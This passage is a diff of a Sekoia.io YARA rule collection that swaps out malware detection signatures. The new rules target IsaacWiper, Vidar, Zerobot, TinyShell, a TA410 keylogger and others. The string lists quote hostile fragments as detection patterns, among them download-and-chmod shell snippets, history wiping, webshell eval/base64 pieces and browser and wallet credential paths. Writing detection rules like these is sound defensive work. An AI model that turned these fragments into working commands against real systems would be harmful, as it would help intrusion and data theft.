-		$ = "node.(*NetworkTopology).InitNetworkMap"
-		$ = "node.CopyNet2Node"
-		$ = "node.(*Node).CommandHandler.func1"
-		$ = "node.(*Buffer).WriteLowLevelPacket"
-		$ = "protocol.(*Packet).ResolveDat"
-		$ = "netio.InitTCP.func2"
+		$ = "Yasso/cmd.setting"
+		$ = "Yasso/cmd.Client"
+		$ = "Yasso/cmd.IdentifyResult"
+		$ = "Yasso/cmd.RespLab"
+		$ = "Go build ID"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize > 15MB and filesize < 20MB and all of them
 }
-rule SEKOIA_Tool_Webshell_B374K_Strings : FILE
+rule SEKOIA_Apt_Ta410_Driver_Keylogger : FILE
 {
 	meta:
-		description = "Detects b374k webshell"
+		description = "Keylogger TA410"
 		author = "Sekoia.io"
-		id = "f53fc668-e1fc-4b85-b850-59aceefb6418"
-		date = "2024-09-06"
+		id = "0cba1b3b-b93e-41e3-a7df-afd306e6b519"
+		date = "2022-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_webshell_b374k_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "1d27b23fceecbb9e854c41f6a8fb878e"
-		hash = "71fd853a3f3efc3dc2846e866187ee59"
-		hash = "187e001c32487d0d68197ddb7e7796c3"
-		hash = "6eac497dfc1020a8475e95542fad197e"
-		hash = "61c6a0bc15efa442853f04bb276ac96e"
-		logic_hash = "b085a50d50fc1fd06d6f75397cf1fa6fa1bc4a0d18b56ed3458990f4abde0632"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_ta410_driver_keylogger.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5ed152cc068f194cb7bf8c34744f0f1ebd4f621e6ae47f14bab64b18d94af4c5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237034,110 +237869,137 @@ rule SEKOIA_Tool_Webshell_B374K_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$func('$x','ev'.'al'.'("
-		$ = "(ba'.'se'.'64'.'_de'.'co'.'de($x)))"
+		$ = "namedpipe_keymousespy" ascii wide
+		$ = "[`LCTRL]" ascii wide
+		$ = "[`RCTRL]" ascii wide
+		$ = "[`BREAK]" ascii wide
+		$ = "[`NUMLOCK]" ascii wide
+		$ = "[`L]" ascii wide
+		$ = "[`R]" ascii wide
+		$ = "[`M]" ascii wide
 
 	condition:
-		2 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Merlin_Crossplatform : FILE
+
+rule SEKOIA_Wiper_Win_Isaacwiper
 {
 	meta:
-		description = "Detects Merlin agent cross platform"
+		description = "Detect the IsaacWiper using multiple methods + ReversingLab rule's condition"
 		author = "Sekoia.io"
-		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be6"
-		date = "2022-01-03"
+		id = "b081e3a3-612e-46ae-93af-82e7ee98fcf7"
+		date = "2022-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/merlin_crossplatform.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "975cc4fe0d89383188f9fd3c516d1e853dd6070d7703c0b5b5874dc1e7e6f32a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/wiper_win_isaacwiper.yar#L4-L45"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0338e11ece112b6f7d88db49cfc703a4431d7ee54f4b9ff0b9e2ea50d39cab4f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".CRT" ascii
-		$s2 = ".tls" ascii
-		$s3 = "github.com/Ne0nd0g/merlin" ascii
-		$s4 = "github.com/refraction-networking" ascii
-		$s5 = "SendMerlinMessage" ascii
-		$s6 = "ifconfigH9" ascii
+		$s1 = "getting drives..." wide
+		$s2 = "physical drives:" wide
+		$s3 = "-- system physical drive" wide
+		$s4 = "-- physical drive" wide
+		$s5 = "logical drives:" wide
+		$s6 = "-- system logical drive:" wide
+		$s7 = "-- logical drive:" wide
+		$s8 = "start erasing physical drives..." wide
+		$s9 = "-- FAILED" wide
+		$s10 = "-- start erasing logical drive" wide
+		$s11 = "start erasing system physical drive..." wide
+		$s12 = "system physical drive -- FAILED" wide
+		$s13 = "start erasing system logical drive" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them and filesize > 5MB and filesize < 15MB
+		pe.imphash( ) == "a4b162717c197e11b76a4d9bc58ea25d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "06d63fddf89fae3948764028712c36d6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "48f101db632bb445c21a10fd5501e343" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5efc98798d0979e69e2a667fc20e3f24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9676f7c827fb9388358aaba3e4bd0cc6" ) or hash.md5 ( pe.rich_signature.clear_data ) == "ec862d3013903478c2ff8dce2792815f" or all of ( $s* )
 }
-rule SEKOIA_Unk_Quad7_Netd_Strings : FILE
+rule SEKOIA_Infostealer_Win_Vidar_Str_Jul22 : FILE
 {
 	meta:
-		description = "Matches netd binary"
+		description = "Detect the Vidar infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "3f527f0e-c101-4356-9024-fc61aea644d1"
-		date = "2024-08-23"
+		id = "1dc18694-aaac-41e6-979a-c06d5d62f5ea"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/unk_quad7_netd_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "cdb37db4543dde5ca2bd98a43699828f"
-		logic_hash = "abd59c5fa0c4c73a2cd9a2263d5573d896c6c0d71d96bd59167b1e2d7fbf108e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_vidar_str_jul22.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "394d148155d46753df188a252678c5ce9d0aa321da8907e74b844d5aa8494a47"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2022-08-23"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "./netd.dat"
-		$ = "./sys.dat"
-		$ = "--conf"
-		$ = "--init"
-		$ = "--nobg"
-		$ = "Url is NULL."
+		$str01 = "vcruntime140.dll" ascii
+		$str02 = "\\screenshot.jpg" ascii
+		$str03 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor" ascii
+		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" ascii
+		$str05 = "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb" ascii
+		$str06 = "\\CC\\%s_%s.txt" ascii
+		$str07 = "\\Autofill\\%s_%s.txt" ascii
+		$str08 = "\\History\\%s_%s.txt" ascii
+		$str09 = "\\Downloads\\%s_%s.txt" ascii
+		$str10 = "Content-Disposition: form-data; name=" ascii
+		$str11 = "Exodus\\exodus.wallet" ascii
+		$str12 = "*%DRIVE_REMOVABLE%*" ascii
+		$opc = {55 8b ec 51 56 8b 75 ?? 33 c0 c7 46 14 ?? ?? ?? ?? 89 46 ?? 68 ?? ?? ?? ?? 8b ce 89 45 ?? 88 06 e8 1f b6 ff ff 8b c6 5e c9 c2 ?? ??}
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 4 of them
+		uint16( 0 ) == 0x5A4D and ( 7 of them or $opc )
 }
-rule SEKOIA_Apt_Cloudatlas_Powertunnel_Loader
+rule SEKOIA_Malware_Tinyshell_Strings : FILE
 {
 	meta:
-		description = "Detects the Powershell loader of the PowerTunnel dll"
+		description = "Detects TinyShell based on strings"
 		author = "Sekoia.io"
-		id = "f2333b8a-99e9-4f28-b0d8-4f7dc4c648c5"
-		date = "2022-11-29"
+		id = "51fe9986-cb33-4802-bb8d-fe3d4cdfdcc8"
+		date = "2024-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_powertunnel_loader.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "742374ad22d9333ef071fe95058f28ae00325cca833b557481ef5d453b3a4977"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_tinyshell_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "fffc89ebbe6ea37072077996e27f86dd"
+		hash = "59a97d4fbd3a54e991dc7e1f0451acf5"
+		hash = "d7ee59eab7f703bfaf1002a39b05c7b9"
+		hash = "3f2dfe47d4563919d889132b2759fd9c"
+		logic_hash = "18d10e7e6f0ba8a9ea7fa8446a930f84ce5eb2f3a022ce3dc62bc3f8fd5699e1"
 		score = 75
-		quality = 55
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "New-Object System.IO.Compression.GzipStream(" ascii fullword
-		$ = "[System.Reflection.Assembly]::Load("
-		$ = ".ReadBytes("
-		$ = ".Service]::StartMain"
+		$ = "_tsh_get_file"
+		$ = "_tsh_put_file"
+		$ = "_tsh_runshell"
+		$ = "Authentication failed."
+		$ = "pel_send_msg"
+		$ = "exec bash --login"
 
 	condition:
-		uint8be( 0 ) == 0x24 and all of them
+		3 of them and filesize < 150KB
 }
-rule SEKOIA_Apt_Oilrig_Oilbooster_Strings : FILE
+rule SEKOIA_Apt_Uac0154_Malicious_Html_Smuggling : FILE
 {
 	meta:
-		description = "Detects OilBooster malware based on strings"
+		description = "UAC-0154 Infection chain"
 		author = "Sekoia.io"
-		id = "001d12bc-1e7e-4a6c-9172-66687d08d827"
-		date = "2023-12-20"
+		id = "923d11e5-6332-456d-8aff-ae7fb76193a8"
+		date = "2023-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_oilbooster_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9562d373ba7602d250aec1eefa2d671da64e897e490da284ffa0e310074266cf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_uac0154_malicious_html_smuggling.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ba37b076ac29edcb9af7792420b527b0d64e7838e0237b39afe98a817eafdf7e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237145,30 +238007,25 @@ rule SEKOIA_Apt_Oilrig_Oilbooster_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/rt.ovf" wide ascii
-		$ = "User-Agent: " wide ascii
-		$ = "/me/drive/items" wide ascii
-		$ = "client_secret" wide ascii
+		$ = "Microsoft&reg; HTML Help Workshop 4.1"
+		$ = "var a=['"
+		$ = ")+b('0x"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
+		all of them and filesize < 100KB
 }
-rule SEKOIA_Killfloor_Avkiller_Strings : FILE
+rule SEKOIA_Apt_Kimsuky_Toddlershark_Strings : FILE
 {
 	meta:
-		description = "Kill-Floor strings"
+		description = "Detects Kimsuky TODDLERSHARK vbs malware"
 		author = "Sekoia.io"
-		id = "ae6908c3-27d4-4d2c-af21-a9548dfcd487"
-		date = "2024-10-29"
+		id = "2db1a424-9e83-4168-8ebf-d3b415b6a576"
+		date = "2024-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/killfloor_avkiller_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "9f16176ac20f7855fa960d321e156d69"
-		hash = "4b019e9ed2de734e242602abce06f7c1"
-		hash = "81ae32d9de8fd21acfc61d62f3292277"
-		hash = "7cb2c4560e02c25463ec70e222ad0018"
-		logic_hash = "e89d0936612104f98b7f56dca09702f31f07868f239c2d11dd738e015e757b3a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_toddlershark_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dee9d03f498437dd6d8399975cd91ec44307067ac4642b9ff31df1a6d6b10468"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237176,131 +238033,117 @@ rule SEKOIA_Killfloor_Avkiller_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "sc create aswArPot.sys type=kernel binpath=%s" ascii
-		$ = "sc start aswArPot.sys" ascii
-		$ = "[*] Enumerating target processes" ascii
-		$ = "[*] Entering main loop... " ascii
-		$ = "aswArPot.pdb" ascii
-		$ = "SeConvertStringSecurityDescriptorToSecurityDescriptor" wide
+		$ = "On Error Resume Next"
+		$ = ".open \"POST\", \"http"
+		$ = ".setRequestHeader"
+		$ = ".send"
+		$ = "Execute("
+		$ = ".responseText)"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 6 of them
+		all of them and filesize < 450
 }
-rule SEKOIA_Infostealer_Win_Lighting : FILE
+
+rule SEKOIA_Apt_Mustangpanda_Maliciousdll_Loading_Plugx_Strings
 {
 	meta:
-		description = "Detect the Lighting infostealer based on specific strings"
+		description = "Detects MustangPanda malicious DLL"
 		author = "Sekoia.io"
-		id = "3c160c16-f417-4fa2-aa44-fb7b981fb2b3"
-		date = "2022-04-07"
+		id = "2296ac6e-63f5-4cff-aeb7-2c5205e6f559"
+		date = "2023-12-18"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2022/04/05/inside-lightning-stealer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_lighting.yar#L1-L40"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1c1d39ce886a433a352c55bf436b959ef528ad7ce38027243ed5b5f1ac79822f"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_maliciousdll_loading_plugx_strings.yar#L3-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "651c096cf7043a01d939dff9ba58e4d69f15b2244c71b43bedb4ada8c37e8859"
+		logic_hash = "667901d36585248a891b90ff8ed7006030151fbbbe0d4a85570944a94edba7f8"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "\\logins.json" wide
-		$str1 = "key3.db" wide
-		$str2 = "\\key4.db" wide
-		$str3 = "cert9.db" wide
-		$str4 = "\\places.sqlite" wide
-		$str5 = "7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9" ascii
-		$str6 = "potentiallyVulnerablePasswords" wide
-		$dll0 = "\\mozglue.dll" wide
-		$dll1 = "\\nss3.dll" wide
-		$dll2 = "SbieDll.dll" wide
-		$app00 = "\\discord\\Local Storage\\leveldb\\" wide
-		$app01 = "Software\\Valve\\Steam" wide
-		$app02 = "Telegram Desktop\\tdata" wide
-		$app03 = "\\Wallets\\Armory\\" wide
-		$app04 = "\\Wallets\\Atomic\\Local Storage\\leveldb\\" wide
-		$app05 = "\\Exodus\\exodus.wallet\\" wide
-		$app06 = "\\Wallets\\Zcash\\" wide
-		$app07 = "uCozMedia\\Uran" wide
-		$app08 = "Comodo\\IceDragon" wide
-		$app09 = "8pecxstudios\\Cyberfox" wide
-		$app10 = "NETGATE Technologies\\BlackHaw" wide
-		$app11 = "Moonchild Productions\\Pale Moon" wide
+		$ = "VirtualAlloc"
+		$ = "VirtualFree"
+		$ = "VirtualProtect"
+		$ = "VirtualQuery"
+		$ = "GCC: (MinGW-W64"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of ( $str* ) and all of ( $dll* ) and 10 of ( $app* )
+		pe.exports( "MsiProvideQualifiedComponentW" ) and all of them
 }
-rule SEKOIA_Apt_Buhtrap_Maldocx
+rule SEKOIA_Trojan_Win_Grandoreiro : FILE
 {
 	meta:
-		description = "Detect the malicious DOCX used by Buhtrap"
+		description = "Finds Grandorerio samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "4aaba2f1-fafd-4e3f-8b18-7beda11464d1"
-		date = "2022-02-25"
+		id = "e48c86a1-e34f-4945-817a-9c85198a77bb"
+		date = "2022-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_buhtrap_maldocx.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "69968fa6836a71cd835f40c5168d197d3b5fc13b62791279f48a6bdeb4709bd5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_win_grandoreiro.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7424478b0cdfe922c2f98bf42e505f22fb0700cfeb54912630ce404c59b05c5e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<xm:macrosheet xmlns=" ascii fullword
-		$ = "CALL(\"kernel32\",\"VirtualFree"
-		$ = "CALL(\"kernel32\",\"CreateFileA"
-		$ = "CALL(\"kernel32\",\"WriteFile"
-		$ = "CALL(\"kernel32\",\"VirtualAlloc"
-		$ = "CALL(\"kernel32\",\"WinExec"
-		$ = "CALL(\"kernel32\",\"lstrcatA"
-		$ = "CALL(\"kernel32\",\"CreateFileA"
-		$ = "CALL(\"kernel32\",\"VirtualFree"
-		$ = "CALL(\"kernel32\",\"ExpandEnvironmentStringsA"
-		$ = "CALL(\"kernel32\",\"CloseHandle"
+		$mut = "ZTP@11" wide
+		$reg01 = "Software\\Embarcadero\\Locales" wide
+		$reg02 = "Software\\CodeGear\\Locales" wide
+		$reg03 = "Software\\Borland\\Locales" wide
+		$reg04 = "Software\\Borland\\Delphi\\Locale" wide
+		$reg05 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" wide
+		$str01 = "SELECT * FROM AntiVirusProduct" wide
+		$str02 = "GetTickCount64" wide
+		$str03 = "C:\\Program Files (x86)\\Embarcadero\\Studio\\20.0\\lib\\Clever Internet Suite" wide
+		$str04 = "{43826D1E-E718-42EE-BC55-A1E261C37BFE}" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SEKOIA_Implant_Win_Apt29_2022_10
+rule SEKOIA_Tool_Efspotato : FILE
 {
 	meta:
-		description = "APT29 implants from October 2022"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "0f270e75-f687-4fdc-a980-fde81107a4d6"
-		date = "2023-02-15"
+		id = "4440ea37-d7d0-4107-867c-576c6e2f4f7e"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_apt29_2022_10.yar#L4-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b9300c2f06b54b16e1cab579d686d986caacf3b6eccec3a4e62d58e94b50bfb4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_efspotato.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cbfd72a16f02903b1ad6fdf3e25f6c5508145d6be4c1776bb77f1ccd6c1954b3"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "1cffaf3be725d1514c87c328ca578d5df1a86ea3b488e9586f9db89d992da5c4"
-		hash2 = "381a3c6c7e119f58dfde6f03a9890353a20badfa1bfa7c38ede62c6b0692103c"
+
+	strings:
+		$s1 = "usage: EfsPotato <cmd> [pipe]" ascii wide
+		$s2 = "Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability)." ascii wide
+		$s3 = "Part of GMH's fuck Tools, Code By zcgonvh." ascii wide
 
 	condition:
-		pe.imphash( ) == "39b818e7bac0a276f509f8c47e467666" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6621113d9f212c71b8dd3ce85c62b251" )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Apt_Qnapworm_Loader_May2022 : FILE
+rule SEKOIA_Bot_Lin_Zerobot_Dec22 : FILE
 {
 	meta:
-		description = "Detects the QNAPWorm loader"
+		description = "Detect the linux Zerobot implant using specific strings"
 		author = "Sekoia.io"
-		id = "c6e87a55-73ea-4df4-ab61-b5d34968d741"
-		date = "2022-05-23"
+		id = "ce028297-a526-4a6a-95db-8762fb5895f6"
+		date = "2022-08-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_qnapworm_loader_may2022.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d31fdaaacd417a4191e79e3a287e84c55109158eaacc789b2129e2ba94e443f6"
+		reference = "https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/bot_lin_zerobot_dec22.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0f4faba9873fa360615b20bc637ecb40f56e6c7f65153f61a762e378320f94c1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237308,35 +238151,37 @@ rule SEKOIA_Apt_Qnapworm_Loader_May2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {
-        66 C1 C0 05
-        0F B7 D8
-        81 C3 85 D0 FF FF
-        66 C1 C3 02
-        0F B7 C3
-        0F B6 9A ?? ?? ?? ??
-        33 D8
-        88 1C 11
-        42
-        0F B6 D2
-        81 FA ?? 00 00 00
-        }
+		$str01 = "rm -rf "
+		$str02 = "wget http://"
+		$str03 = "curl -O http://"
+		$str04 = "tftp"
+		$str05 = "-c get"
+		$str06 = "ftpget -v -u anonymous -P"
+		$str07 = "chmod 777"
+		$str08 = "nohup"
+		$str09 = "/dev/null 2>&1 &"
+		$str10 = "zero."
+		$str11 = "ppc64le"
+		$str12 = "riscv64"
+		$str13 = "s390x"
+		$str14 = "rm -rf ~/.bash_history"
+		$str15 = "history -c"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of ( $s* )
+		11 of ( $str* ) and filesize < 10KB
 }
-rule SEKOIA_Infostealer_Win_Mars_Stealer_Variant_Llcppc1 : FILE
+rule SEKOIA_Infostealer_Win_Fwit_Strings : FILE
 {
 	meta:
-		description = "Detect Mars Stealer variand llcppc1"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "3e2c7440b2fc9e4b039e6fa8152ac8fe"
-		date = "2022-03-10"
+		id = "332e89ad-d1fe-4da6-9354-0978ef173e78"
+		date = "2023-06-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_mars_stealer_variant_llcppc1.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f9d92338fa31c38648b72d7f9a953201c7e498237bc9d02d6247d1882d1e3432"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_fwit_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4e28b6d67e2087b2f28817b19812b8bd56227175cd3d9c7037290127d4ec05a5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -237344,118 +238189,155 @@ rule SEKOIA_Infostealer_Win_Mars_Stealer_Variant_Llcppc1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a = {ff 15 ?? ?? ?? ?? 89 45 ?? 6a 14 68 ?? ?? ?? ?? ff 75 ?? e8 23 00 00 00 ff 75 ?? ff 75 ?? ff 75 ?? e8 5c 00 00 00}
+		$s1 = "C:\\ProgramData\\Temp" wide
+		$s2 = "{:08x}" wide
+		$s3 = "CURL_SSLVERSION" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $a
+		( uint16be( 0 ) == 0x4d5a ) and all of them
 }
-rule SEKOIA_Xworm_Dotnet_Injector
+rule SEKOIA_Apt_Gamaredon_Flash_Infostealer : FILE
 {
 	meta:
-		description = ".NET injector used by XWorm TA"
+		description = "Detects the Gamaredon's Flash InfoStealer"
 		author = "Sekoia.io"
-		id = "50581a9d-afc3-43da-9e34-3a553cbd01b4"
-		date = "2022-12-02"
+		id = "f060fe4b-74fd-4ef3-ac86-916e2113ff24"
+		date = "2023-01-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/xworm_dotnet_injector.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4777edacf4719e602ae1fb7204ea97cd594277faa1c2b7ad430066ad82b40768"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_flash_infostealer.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
